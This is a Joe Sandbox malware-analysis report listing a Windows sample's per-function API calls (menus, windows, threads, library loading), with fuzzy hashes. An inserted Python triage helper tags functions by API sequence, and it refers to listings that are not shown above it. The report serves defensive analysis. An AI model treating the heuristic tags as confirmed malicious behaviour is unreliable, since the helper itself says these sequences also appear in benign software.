• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                          • String ID:
                                                                                          • API String ID: 2547909840-0
                                                                                          • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                          • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                          • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                          • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                          • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2354583917-0
                                                                                          • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                          • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                          • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                          • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                          • String ID: Wu
                                                                                          • API String ID: 2449869053-4083010176
                                                                                          • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                          • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                          • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                          • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
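The per-function API listings above (the GetKeyboardState/SetKeyboardState/PostMessageW entries, the CreateToolhelp32Snapshot/Process32FirstW/__wcsicoll/Process32NextW entry, and the LoadLibraryW/GetProcAddress/FreeLibrary entry) are easier to triage once the call sequence and the raw message constants are decoded. Below is an added example, not part of the Joe Sandbox report and not the sample's own code: a Python helper that parses bullet lines in the report's format and tags each function by the behaviour its sequence implies. The constants it names are documented Windows values (WM_KEYDOWN = 0x100, WM_KEYUP = 0x101, VK_SHIFT = 0x10, VK_CONTROL = 0x11, VK_MENU = 0x12, VK_LWIN = 0x5B); the line regex, the tag heuristics and the sample text (constructed from three of this page's entries) are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox-style per-function API listings.

Added example, not part of the Joe Sandbox report and not the sample's
own code. It parses 'APIs' bullet lists as they appear in the report and
tags each function with the behaviour its API sequence implies.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: three entries copied from this page, in the report's bullet format.
SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
APIs
• CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
• Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
• __wsplitpath.LIBCMT ref: 004737E1
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• __wcsicoll.LIBCMT ref: 00473818
• Process32NextW.KERNEL32(00000000,?), ref: 00473844
• CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
APIs
• LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
• GetProcAddress.KERNEL32(?,?), ref: 00463E68
• GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
• FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
"""

# One bullet: "Name.MODULE(args), ref: ADDR" or "Name.LIBCMT ref: ADDR" (assumed format).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Documented Windows constants for the PostMessageW arguments seen in the report.
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool      # True for "Part of subcall function ..." lines


@dataclass
class Entry:
    calls: list = field(default_factory=list)

    def names(self):
        """API names called directly by this function (subcall lines excluded)."""
        return [c.name for c in self.calls if not c.subcall]


def parse_listing(text):
    """Split the text into one Entry per 'APIs' header, each holding its parsed calls."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append(Entry())
            continue
        m = API_RE.match(line)
        if m and entries:
            args = [a for a in (m.group("args") or "").split(",") if a]
            entries[-1].calls.append(Call(m.group("name"), m.group("module"), args,
                                          m.group("ref"), "Part of subcall" in line))
    return entries


def decode_post_message(call):
    """Name the WM_* message and VK_* key of a PostMessageW(hwnd, msg, wParam, lParam) call."""
    if call.name != "PostMessageW" or len(call.args) < 3:
        return None
    try:
        msg, vk = int(call.args[1], 16), int(call.args[2], 16)
    except ValueError:          # '?' means the sandbox could not resolve that argument
        return None
    return WM_NAMES.get(msg, hex(msg)), VK_NAMES.get(vk, hex(vk))


def classify(entry):
    """Tag an entry by the API sequence it contains (heuristics are this example's own)."""
    names = entry.names()
    tags = set()
    # Snapshot + walk + case-insensitive compare: looking up a process by name.
    if "CreateToolhelp32Snapshot" in names and "Process32FirstW" in names and \
            any(n.endswith("icoll") or n.endswith("icmp") for n in names):
        tags.add("process-name-lookup")
    # Load a module and resolve exports at run time instead of via the import table.
    if "LoadLibraryW" in names and "GetProcAddress" in names:
        tags.add("dynamic-api-resolution")
    # Rewriting keyboard state and posting modifier-key messages to another window.
    keys = [k for k in (decode_post_message(c) for c in entry.calls) if k]
    if keys and all(k[1].startswith("VK_") for k in keys) and "SetKeyboardState" in names:
        tags.add("synthetic-modifier-keys:" + ",".join(sorted({k[0] for k in keys})))
    return tags


if __name__ == "__main__":
    for i, e in enumerate(parse_listing(SAMPLE)):
        print(i, e.names(), sorted(classify(e)))
```

The decoded keystroke tag is what distinguishes the two near-identical functions at 00444A0F and 00444C08 in the listing: one posts WM_KEYUP for Shift, Ctrl, Alt and the left Windows key, the other WM_KEYDOWN for the same keys, after replacing the keyboard state with SetKeyboardState. Treat the tags as triage hints only; the same sequences occur in benign automation runtimes, so they are a reason to look at the function, not a verdict.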
                                                                                          APIs
                                                                                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                          • GetMenu.USER32 ref: 004776AA
                                                                                          • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                          • _wcslen.LIBCMT ref: 0047771A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CountItemStringWindow_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1823500076-0
                                                                                          • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                          • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                          • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                          • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                          APIs
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                                          • String ID:
                                                                                          • API String ID: 896007046-0
                                                                                          • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                          • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                          • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                          • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                          • SendMessageW.USER32(02FE1B10,000000F1,00000000,00000000), ref: 004414C6
                                                                                          • SendMessageW.USER32(02FE1B10,000000F1,00000001,00000000), ref: 004414F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                          • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                          • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                          • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 004484C4
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                          • IsMenu.USER32(?), ref: 0044857B
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                          • DrawMenuBar.USER32 ref: 004485E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 3866635326-4108050209
                                                                                          • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                          • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                          • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                          • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                          • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                          • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                          • String ID: 0vH
                                                                                          • API String ID: 327565842-3662162768
                                                                                          • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                          • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                          • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                          • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                          • GetFocus.USER32 ref: 00448B1C
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3429747543-0
                                                                                          • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                          • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                          • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                          • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                          • __swprintf.LIBCMT ref: 0045D3CC
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                          • String ID: %lu$HH
                                                                                          • API String ID: 3164766367-3924996404
                                                                                          • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                          • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                          • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                          • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: Msctls_Progress32
                                                                                          • API String ID: 3850602802-3636473452
                                                                                          • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                          • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                          • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                          • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                          APIs
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                          • String ID:
                                                                                          • API String ID: 3985565216-0
                                                                                          • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                          • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                          • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                          • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                          • __calloc_crt.LIBCMT ref: 00415743
                                                                                          • __getptd.LIBCMT ref: 00415750
                                                                                          • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                          • __dosmaperr.LIBCMT ref: 004157A9
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1269668773-0
                                                                                          • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                          • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                          • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                          • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                          APIs
                                                                                            • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                            • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
